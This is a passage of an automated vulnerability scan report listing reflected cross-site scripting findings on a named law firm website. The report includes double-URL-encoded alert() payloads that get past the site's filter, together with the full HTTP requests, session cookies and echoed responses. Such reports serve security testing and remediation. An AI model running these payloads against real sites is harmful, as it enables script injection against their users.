User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="e7f23"><script>alert(1)</script>472c4d98eb6" value="1">
...[SNIP]...

4.190. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jq.equalheights.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221 was submitted in the REST URL parameter 1. This input was echoed as d732e"><script>alert(1)</script>3c700324221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsd732e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3c700324221/jq.equalheights.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsd732e"><script>alert(1)</script>3c700324221/jq.equalheights.js" value="">
...[SNIP]...

4.191. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jq.equalheights.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b was submitted in the REST URL parameter 2. This input was echoed as f70d5"><script>alert(1)</script>0445fb7d91b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/jq.equalheights.jsf70d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0445fb7d91b HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/jq.equalheights.jsf70d5"><script>alert(1)</script>0445fb7d91b" value="">
...[SNIP]...

4.192. http://www.wileyrein.com/js/jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45 was submitted in the REST URL parameter 1. This input was echoed as 67315"><script>alert(1)</script>635a97b6d45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js67315%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e635a97b6d45/jquery.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js67315"><script>alert(1)</script>635a97b6d45/jquery.js" value="">
...[SNIP]...

4.193. http://www.wileyrein.com/js/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d was submitted in the REST URL parameter 2. This input was echoed as d428a"><script>alert(1)</script>229db4da92d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/jquery.jsd428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/jquery.jsd428a"><script>alert(1)</script>229db4da92d" value="">
...[SNIP]...

4.194. http://www.wileyrein.com/js/menu.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/menu.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24 was submitted in the REST URL parameter 1. This input was echoed as a0519"><script>alert(1)</script>056a75bdc24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsa0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24/menu.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsa0519"><script>alert(1)</script>056a75bdc24/menu.js" value="">
...[SNIP]...

4.195. http://www.wileyrein.com/js/menu.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/menu.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 was submitted in the REST URL parameter 2. This input was echoed as 72b32"><script>alert(1)</script>99218231cb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/menu.js72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/menu.js72b32"><script>alert(1)</script>99218231cb0" value="">
...[SNIP]...

4.196. http://www.wileyrein.com/js/script.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/script.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc was submitted in the REST URL parameter 1. This input was echoed as 651f5"><script>alert(1)</script>51a543addfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc/script.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js651f5"><script>alert(1)</script>51a543addfc/script.js" value="">
...[SNIP]...

4.197. http://www.wileyrein.com/js/script.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c was submitted in the REST URL parameter 2. This input was echoed as a9d57"><script>alert(1)</script>6a7d4ade41c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/script.jsa9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/script.jsa9d57"><script>alert(1)</script>6a7d4ade41c" value="">
...[SNIP]...

4.198. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.core.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079 was submitted in the REST URL parameter 1. This input was echoed as 2bbc8"><script>alert(1)</script>5280505d079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079/ui.core.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js2bbc8"><script>alert(1)</script>5280505d079/ui.core.js" value="">
...[SNIP]...

4.199. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.core.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 was submitted in the REST URL parameter 2. This input was echoed as 79a0d"><script>alert(1)</script>713c91dcce2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.core.js79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.core.js79a0d"><script>alert(1)</script>713c91dcce2" value="">
...[SNIP]...

4.200. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.datepicker.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d was submitted in the REST URL parameter 1. This input was echoed as 33f74"><script>alert(1)</script>75df592a80d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d/ui.datepicker.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js33f74"><script>alert(1)</script>75df592a80d/ui.datepicker.js" value="">
...[SNIP]...

4.201. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.datepicker.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea was submitted in the REST URL parameter 2. This input was echoed as 29ad5"><script>alert(1)</script>e294e4483ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.datepicker.js29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.datepicker.js29ad5"><script>alert(1)</script>e294e4483ea" value="">
...[SNIP]...

4.202. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.dialog.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd was submitted in the REST URL parameter 1. This input was echoed as fe969"><script>alert(1)</script>c77ca9823dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsfe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd/ui.dialog.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsfe969"><script>alert(1)</script>c77ca9823dd/ui.dialog.js" value="">
...[SNIP]...

4.203. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.dialog.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de was submitted in the REST URL parameter 2. This input was echoed as 4ae75"><script>alert(1)</script>6ccc3364de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.dialog.js4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.dialog.js4ae75"><script>alert(1)</script>6ccc3364de" value="">
...[SNIP]...

4.204. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.draggable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed was submitted in the REST URL parameter 1. This input was echoed as 41fbd"><script>alert(1)</script>3ba108ca8ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

